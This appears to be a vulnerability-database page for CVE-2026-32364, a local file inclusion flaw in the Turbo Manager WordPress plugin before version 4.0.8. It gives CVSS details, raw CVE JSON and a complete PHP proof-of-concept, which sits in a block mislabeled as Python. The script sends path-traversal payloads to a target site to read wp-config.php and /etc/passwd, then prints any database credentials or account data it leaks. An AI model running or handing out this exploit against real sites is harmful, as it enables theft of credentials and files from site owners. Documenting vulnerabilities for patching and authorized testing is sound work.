Security Vulnerability Report
中文
CVE-2026-32364 CVSS 7.5 HIGH

CVE-2026-32364

Published: 2026-03-13 19:54:50
Last Modified: 2026-04-22 21:30:26

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in redqteam Turbo Manager turbo-manager allows PHP Local File Inclusion.This issue affects Turbo Manager: from n/a through < 4.0.8.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Turbo Manager < 4.0.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<?php /** * CVE-2026-32364 PoC - Turbo Manager LFI Vulnerability * Affected: Turbo Manager < 4.0.8 * Type: Local File Inclusion * * Usage: php cve-2026-32364_poc.php <target_url> <vulnerable_param> * Example: php cve-2026-32364_poc.php http://target.com/wordpress/ file */ class TurboManagerLFI { private $targetUrl; private $paramName; private $wordpressPaths = [ '../../../../wp-config.php', '../../../../etc/passwd', '../../../../../../etc/passwd', '../wp-config.php', 'wp-config.php' ]; public function __construct($targetUrl, $paramName = 'file') { $this->targetUrl = rtrim($targetUrl, '/'); $this->paramName = $paramName; } public function exploit() { echo "[*] CVE-2026-32364 Turbo Manager LFI PoC\n"; echo "[*] Target: {$this->targetUrl}\n"; echo "[*] Parameter: {$this->paramName}\n\n"; foreach ($this->wordpressPaths as $path) { echo "[*] Testing path: {$path}\n"; $payload = urlencode($path); $url = "{$this->targetUrl}/?{$this->paramName}={$payload}"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); $response = curl_exec($ch); $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); if ($httpCode == 200 && !empty($response)) { // Check for sensitive content indicators if (strpos($response, 'DB_NAME') !== false || strpos($response, 'root:x:') !== false) { echo "[!] VULNERABLE! Sensitive file leaked:\n"; echo substr($response, 0, 500) . "...\n"; return true; } } } echo "[*] Basic tests completed. Manual verification recommended.\n"; return false; } public function generateReport() { return [ 'cve_id' => 'CVE-2026-32364', 'vulnerability' => 'Local File Inclusion in Turbo Manager', 'severity' => 'HIGH', 'cvss_score' => 7.5, 'affected_versions' => '< 4.0.8', 'remediation' => 'Upgrade to Turbo Manager 4.0.8 or later' ]; } } // CLI execution if (php_sapi_name() === 'cli' && isset($argv[1])) { $poc = new TurboManagerLFI($argv[1], $argv[2] ?? 'file'); $poc->exploit(); } ?>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32364", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:50.447", "lastModified": "2026-04-22T21:30:26.497", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in redqteam Turbo Manager turbo-manager allows PHP Local File Inclusion.This issue affects Turbo Manager: from n/a through < 4.0.8."}, {"lang": "es", "value": "Control inadecuado del nombre de fichero para la declaración include/require en el programa PHP (vulnerabilidad de 'Inclusión Remota de Ficheros de PHP') en redqteam Turbo Manager turbo-manager permite la inclusión local de ficheros de PHP. Este problema afecta a Turbo Manager: desde n/a hasta &lt; 4.0.8."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/turbo-manager/vulnerability/wordpress-turbo-manager-plugin-4-0-8-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}